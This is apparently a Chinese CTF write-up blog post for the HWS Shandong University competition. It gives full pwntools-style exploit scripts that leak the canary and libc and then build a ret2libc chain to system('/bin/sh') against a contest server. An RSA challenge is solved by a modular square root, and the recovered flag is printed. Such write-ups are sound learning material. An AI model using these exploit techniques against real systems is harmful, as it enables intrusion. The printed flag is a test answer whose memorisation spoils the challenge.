2023.11.18

两天半的比赛,就打了半天(因为要赶去打香山杯决赛了),不过结果还算好,人生第一次拿了两个一血hhh。写wp的时候人在中大南校北门的酒店里:)

controller

格式化字符串泄露canary之后打ret2libc即可。

from evilblade import *

context(os='linux', arch='amd64')

context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')

libset('./libc-2.27.so')

evgdb()

rsetup('124.71.135.126',30024)

rdi = 0x0000000000402533 # pop rdi ; ret

putsg = gotadd('puts')

puts = pltadd('puts')

sl(b'6')

sl(b'2')

sl(b'2')

sla('fo',b'%13$p')

sl(b'')

sl(b'1')

sl(b'')

ru(b'No.2')

addx = getx(-13,-1)

base = addx - 0x21c87

dpx('libcbase',base)

sl(b'6')

sl(b'2')

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

addx=tet()

can = getx(-19,-1)

dpx('can',can)

#需要泄露canary

sl(b'0')

sl(b'0')

sl(b'')

sl(b'9')

sla('ame:',b's'*1)

sh = base+0x00000000001b3d88

sys = pltadd('system')

ret = 0x0000000000400b3e

#sla(b'password:',b'\x00\x02aaaaaa'+p64(can)+p64(0x400d20))

sla(b'password:',b'\x00\x02aaaaaa'+p64(can)+b'aaaaaaaa'+p64(rdi)+p64(sh)+p64(ret)*3+p64(sys))

ia()

inverse

ret2libc和整数溢出

from evilblade import *

context(os='linux', arch='amd64')

context(os='linux', arch='amd64', log_level='debug')

setup('./pwn')

libset('./libc-2.27.so')

evgdb()

rsetup('124.71.135.126',30007)

tag = 0x804C030

puts = pltadd('puts')

putsg = gotadd('puts')

sa(':',b'/bin/sh')

sl(b'-1')

sla(':',b'a'*(0x3c+4)+p32(puts)+p32(0x80493d5)+p32(putsg))

add = getx64(0,-17)

base = getbase(add,'puts')

pause()

sl(b'-1')

sys = symoff('system',base)

sh = base + 0x0017b9db

sl(b'a'*(0x3c+4)+p32(sys)+p32(0xdeadbeef)+p32(sh)+p32(0xdeadbeaf))

ia()

ezrsa

求模平方根即可。

n = 4124820799737107236308837008524397355107786950414769996181324333556950154206980059406402767327725312238673053581148641438494212320157665395208337575556385

m = 13107939563507459774616204141253747489232063336204173944123263284507604328885680072478669016969428366667381358004059204207134817952620014738665450753147857

def legendre_symbol(a, p):

    # 计算雅可比符号 (a/p)

    if a % p == 0:

        return 0

    elif pow(a, (p - 1) // 2, p) == 1:

        return 1

    else:

        return -1

def mod_sqrt(n, p):

    # Tonelli-Shanks 算法求模平方根

    if legendre_symbol(n, p) != 1:

        raise Exception('No modular square root exists')

    q = p - 1

    s = 0

    while q % 2 == 0:

        q //= 2

        s += 1

    if s == 1:

        return pow(n, (p + 1) // 4, p)

    z = 2

    while legendre_symbol(z, p) != -1:

        z += 1

    c = pow(z, q, p)

    r = pow(n, (q + 1) // 2, p)

    t = pow(n, q, p)

    m = s

    while t != 1:

        i = 1

        while pow(t, 2**i, p) != 1:

            i += 1

        b = pow(c, 2**(m - i - 1), p)

        r = (r * b) % p

        t = (t * b * b) % p

        c = (b * b) % p

        m = i

    return r

def solve_quadratic_congruence(n, m):

    # 解二次同余方程 x^2 ≡ n (mod m)

    if m == 2:

        return [n % 2, (n % 2) ^ 1]  # 对于模2,只有0和1两个解

    solutions = []

    # 判断模平方根是否存在

    if pow(n, (m - 1) // 2, m) != 1:

        raise Exception('No solution exists')

    # 计算模平方根

    sqrt_n = mod_sqrt(n, m)

    # 解方程

    x1 = sqrt_n

    x2 = m - sqrt_n

    solutions.append(x1)

    solutions.append(x2)

    return solutions

# 示例用法

result = solve_quadratic_congruence(n, m)

print(f"Solutions for x^2 ≡ {n} (mod {m}): {result}")

'''

>>> from Crypto.Util.number import *

>>> long_to_bytes(13107939563507459774616204141253747489232063336204173944123263271467599846065153978657975398261302535968199127597145828004727119047657179535038810099310932)

b'\xfaFF"\x0bxn\x93\xd1\xfd8\x91\x8d;g\x8c\xf7Wj\xcf\x8c\xde\x94\x14\xea\xd9\xfdB\xd5\x16\xe4>\xe5\xdf%(\xb29^\x87v\x04\x9eOV\xc9\xd18\xc6o\x08\xb8vL\x16N\xb6\xede\xf9\x13\x90aT'

>>> long_to_bytes(13040004482820526093820693618708125830699182230406913376202407698904962835203626640653836925)

b'flag{9971e255f0c020e8e57fbae75f43d7fb}'

'''

HWS山大专区PWN双一血 & CRYPTO-WP的更多相关文章

  1. [复现]2021 DASCTF X BUUOJ 五月大联动-PWN

    [复现]2021 DASCTF X BUUOJ 五月大联动 由于我没ubuntu16就不复现第一个题了,直接第二个 正常的off by one from pwn import * context.os ...

  2. 腾讯云开放云压测“黑科技“,产品上线从此不再“压力山大"

    商业转载请联系腾讯WeTest获得授权,非商业转载请注明出处. 能否解决"高并发"问题一直是检验一个产品后台是否稳定,架构是否合理,性能是否强大的核心标准.对于产品而言,多高的并发 ...

  3. bugku crypto wp上半部分汇总

    1.滴答~滴 摩斯码,在线解开. 2. 栅栏密码,在线解就出flag了. 3. Ook解密,由.?!Ook组成密文,在线网站解密 4.这不是摩斯密码 有点像jsfuck,发现又不是,因为不会出现大于号 ...

  4. 双11遇上ZBrushCore,如此优惠还等什么!

    对不起!让大家久等了,ZBrush简体中文版ZBrushCore这次是真的来了,恰逢双11,老板说了,钱不是问题,你们开心就好,特别是热爱3D的单身狗们!你们那么热爱这个行业,1099元/套终身授权使 ...

  5. 微信事业群WXG成立 致力于打造微信大平台

    今天,微信之父张小龙带领微信团队成立微信事业群(WeiXin Group,简称WXG),致力于打造微信大平台,由他们负责微信基础平台.微信开放平台.微信支付拓展.O2O等微信延伸业务的发展,并包括邮箱 ...

  6. "浪潮杯"第六届ACM山东省省赛山科场总结

    从空间拷过来的.尽管已经过去一个月了.记忆犹新 也算是又一次拾起这个blog Just begin 看着一群群大牛还有队友男神的省赛总结都出了 我最终也耐不住寂寞 来做个流水账抒抒情好了 第一次省赛 ...

  7. 分布式系统中我们会对一些数据量大的业务进行分拆,分布式系统中唯一主键ID的生成问题

    分布式全局唯一ID生成策略​ https://www.cnblogs.com/vandusty/p/11462585.html 一.背景 分布式系统中我们会对一些数据量大的业务进行分拆,如:用户表,订 ...

  8. 2021羊城杯比赛复现(Crypto)

    bigrsa 题目: from Crypto.Util.number import * from flag import * n1 = 10383529640908175186077053551474 ...

  9. 5G为何采纳华为力挺的Polar码?一个通信工程师的大实话

    Polar码被采纳为5G eMBB场景的控制信道编码,这两天连续被这条消息刷屏,连吃瓜群众都直呼好爽. 然而,随着媒体报道的持续发酵,真相在口口相传中变了形,不乏夸大不实之嫌,小编终于坐不住了,也想吐 ...

  10. [转][业界动态] 5G为何采纳华为力挺的Polar码?一个通信工程师的大实话

    本文转自:http://xinsheng.huawei.com/cn/index.php?app=forum&mod=Detail&act=index&id=3264791 P ...

随机推荐

  1. 机器学习-无监督机器学习-LDA线性判别分析-25

    目录 1. Linear Discriminant Analysis 线性判别分析 1. Linear Discriminant Analysis 线性判别分析 经常被用于分类问题的降维技术,相比于P ...

  2. Oracle ORA-01861: 文字与格式字符串不匹配(日期格式导致的问题)

    1.问题 如图所示,Oracle ORA-01861: 文字与格式字符串不匹配.这里的日期格式出现问题,导致了ORA-01861错误. 2.解决方式 原因: 如果直接按照字符串方式,或者直接使用to_ ...

  3. RSA趣题篇(简单型)

    1.n与p的关系 题目 ('n=', 288990088827100766680640490138486855101396196362885475612662192799072729620922966 ...

  4. 【面试题精讲】如何使用Stream的聚合功能

    有的时候博客内容会有变动,首发博客是最新的,其他博客地址可能会未同步,认准https://blog.zysicyj.top 首发博客地址 系列文章地址 求和(Sum): List<Integer ...

  5. Docker导出镜像的总结

    Docker导出镜像的总结 安装Docker mkdir -p /etc/docker cat >/etc/docker/daemon.josn <<EOF { "bip& ...

  6. 【记录一个问题】golang 中的 ecdsa(椭圆曲线加密) 算法很慢,因为用到了系统调用

    代码中使用了椭圆曲线算法来签名,实际运行中发现不够快: func BenchmarkECDSA(b *testing.B) { privateKeyInst, err := parseSignatur ...

  7. 【第4个渗透靶机项目】 Tr0ll

    每天都要加油哦! 0x00  信息搜集 首先找到一下靶机的ip,并扫描端口. 靶机和kali都是桥接. 那么先看一下kali的ifconfig信息. nmap -sn 192.168.0.0/24  ...

  8. vulnhub靶场渗透学习

    攻击机:192.168.100.251 目标机:192.168.100.17 netdiscover netdiscover -r 192.168.100.1/24 Currently scannin ...

  9. Python 潮流周刊第 19 期摘要

    原文全文:https://pythoncat.top/posts/2023-09-09-weekly 文章&教程 1.Mojo 终于提供下载了! 2.我们能从 PEP-703 中学到什么? 3 ...

  10. Qt连接MySQL的问题解决方法

    Qt5在连接MySQL数据库时会出现一些问题,本文介绍两种最常见的问题,以及其相对简单的解决办法. Qt5数据库支持列表里没有MySQL 输入以下代码查看支持的数据库类型 //打印支持的数据库类型 q ...